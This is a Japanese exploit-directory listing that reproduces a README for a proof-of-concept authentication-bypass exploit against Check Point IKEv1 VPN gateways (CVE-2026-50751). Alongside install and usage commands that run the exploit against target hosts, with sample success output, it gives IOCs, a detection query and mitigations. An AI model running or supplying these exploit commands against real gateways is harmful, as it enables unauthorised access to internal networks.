Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-50751---Check-Point-IKEv1-Authentication-Bypass-Exploit — 脆弱性: リモートアクセスおよびモバイルアクセスにおけるロジックフローの脆弱性 | Kitploit
ツール/GitHubGitHub/fevar54/cve-2026-50751---check-point-ikev1-authentication-bypass-exploit
認証と認可脆弱性スキャナー脆弱性分析エクスプロイトネットワークセキュリティペネトレーションテスト
GitHubfevar54/cve-2026-50751---check-point-ikev1-authentication-bypass-exploit

CVE-2026-50751---Check-Point-IKEv1-Authentication-Bypass-Exploit

脆弱性: リモートアクセスおよびモバイルアクセスにおけるロジックフローの脆弱性

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
1373ヶ月前未レビュー

CVE-2026-50751 - Check Point IKEv1 認証バイパスエクスプロイト

Security Rating CVSS CISA KEV License Python

⚠️ 重要注意事項

このコードは教育目的および許可されたセキュリティテストにのみ使用してください。 明示的な許可なくシステムに対して不正に使用することは違法です。 著者は本ツールの誤用について一切の責任を負いません。

📋 説明

CVE-2026-50751 は、Check Point の IKEv1 (非推奨) プロトコルにおける重大な認証バイパスの脆弱性であり、Remote Access VPN および Mobile Access に影響を与えます。認証されていない攻撃者が、証明書検証の欠陥を悪用して、有効なパスワードなしで VPN 接続を確立する可能性があります。

技術的詳細

  • タイプ: 認証バイパス (CWE-287)
  • CVSS スコア: 9.3 (Critical)
  • ベクター: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
  • 活発な悪用: あり (2026-05-07 以降)
  • CISA KEV: 2026-06-08 追加、期限 2026-06-11

🎯 影響を受けるバージョン

製品バージョン
Security GatewaysIKEv1 が有効な R80.40 - R82.10
Spark FirewallsR80.20.X, R81.10.X, R82.00.X
Mobile AccessIKEv1 が有効なすべてのバージョン

必要な条件

  • ✅ Remote Access VPN または Mobile Access が有効
  • ✅ IKEv1 がリモートアクセスで有効
  • ✅ ゲートウェイがレガシー Remote Access クライアントを受け入れる
  • ✅ マシン証明書は不要

🔧 インストール

root@kitploit:~
# リポジトリのクローン
git clone https://github.com/username/CVE-2026-50751-PoC
cd CVE-2026-50751-PoC

# 依存関係のインストール
pip install -r requirements.txt

# 実行権限の付与
chmod +x exploit.py

📦 依存関係

root@kitploit:~
cryptography>=41.0.0
scapy>=2.5.0

🚀 使用方法

検出スキャン

root@kitploit:~
# IKEv1 が有効かどうかを検出
python3 detector.py -t 192.168.1.1 -p 500

# 高速スキャン
python3 detector.py -t vpn.target.com -p 4500

エクスプロイト (許可された使用のみ)

root@kitploit:~
# 認証バイパスの実行
python3 exploit.py -t 192.168.1.1 -p 500

# 特定のインターフェースを使用
python3 exploit.py -t vpn.target.com --interface eth0

# 詳細モード
python3 exploit.py -t 192.168.1.1 -p 500 -v

期待される出力

root@kitploit:~
╔═══════════════════════════════════════════════════════════════╗
║  CVE-2026-50751 - Check Point IKEv1 Authentication Bypass   ║
║  Critical VPN Authentication Bypass Exploit                 ║
║  CVSS: 9.3 | CISA KEV: 2026-06-08                          ║
╚═══════════════════════════════════════════════════════════════╝

[1] Initiating IKEv1 Main Mode...
[+] Received response - SPI: a1b2c3d4e5f67890
[2] Sending crafted KE + NONCE payloads...
[+] Gateway accepted crafted KE/NONCE - Vulnerability triggered!
[3] Calculating authentication keys...
[4] Sending spoofed authentication...
[+] SUCCESS! Authentication bypassed!
[+] Established IKE SA without valid credentials
[5] Establishing VPN tunnel...
[+] VPN tunnel established!
[+] Internal network access available

[✓] EXPLOIT SUCCESSFUL
[✓] Authentication bypass achieved
[✓] VPN tunnel established
[!] System is VULNERABLE - Apply hotfix immediately

🔍 侵害の検出

SmartConsole ログの検索

root@kitploit:~
# 攻撃者を検出するクエリ
action:"Key Install" AND (src:45.77.149.152 OR dst:45.77.149.152)

既知の IOC

タイプ値
攻撃者の IP45.77.149.152, 209.182.225.136, 38.60.157.139, 162.33.177.101, 45.76.26.42, 144.208.127.155, 38.54.88.201, 38.54.107.167, 66.42.99.200, 45.63.104.106, 45.61.136.173
ハッシュ52fda5c1b9704544f32ee98d9060e689, 51d39aa39478beeac94f2d12f682ecce

🛡️ 緩和策

オプション 1 - ホットフィックスの適用 (推奨)

バージョンホットフィックステイクリンク
R82.10Take 19ダウンロード
R82Take 103ダウンロード
R81.20Take 141ダウンロード

オプション 2 - 一時的な緩和策

  • レガシークライアントを無効化:

    SmartConsole → Gateway → VPN Clients → Authentication

    "Allow older clients" のチェックを外す

  • IKEv2 のみを強制:

    Global Properties → Remote Access → VPN Authentication

    "IKEv2 only" を選択

  • Machine Certificate を必須にする:

    VPN Clients → Authentication → Machine Certificate Authentication

    を "Mandatory" に設定

📚 参考文献

  • NVD - CVE-2026-50751
  • Check Point SK185033
  • CISA Known Exploited Vulnerabilities
  • Blog Post - Check Point Research

📊 タイムライン

日付イベント
2026-05-07最初の悪用が観測される
2026-06-04Check Point が調査を開始
2026-06-08CVE 公開、CISA が KEV に追加
2026-06-11CISA のパッチ適用期限

⚖️ 免責事項

このソフトウェアは「現状のまま」提供され、いかなる種類の保証もありません。著者は本ツールの誤用について一切の責任を負いません。所有しているシステム、または明示的なテスト許可を得ているシステムでのみ使用してください。

📞 連絡先

バグの報告や貢献については:

  • GitHub で issue を開く
  • 連絡先: [email protected]

🌟 クレジット

  • Check Point Research - 発見と分析に対して
  • CISA - 調整と普及に対して
  • セキュリティコミュニティ - 迅速な対応に対して

⭐ この PoC が役に立ったなら、リポジトリにスターを付けることを検討してください


📄 ライセンス (GPLv3)


📦 requirements.txt

root@kitploit:~
cryptography>=41.0.0
scapy>=2.5.0
colorama>=0.4.6

⚠️ GitHub 上の重要な注意事項:

ツールをダウンロード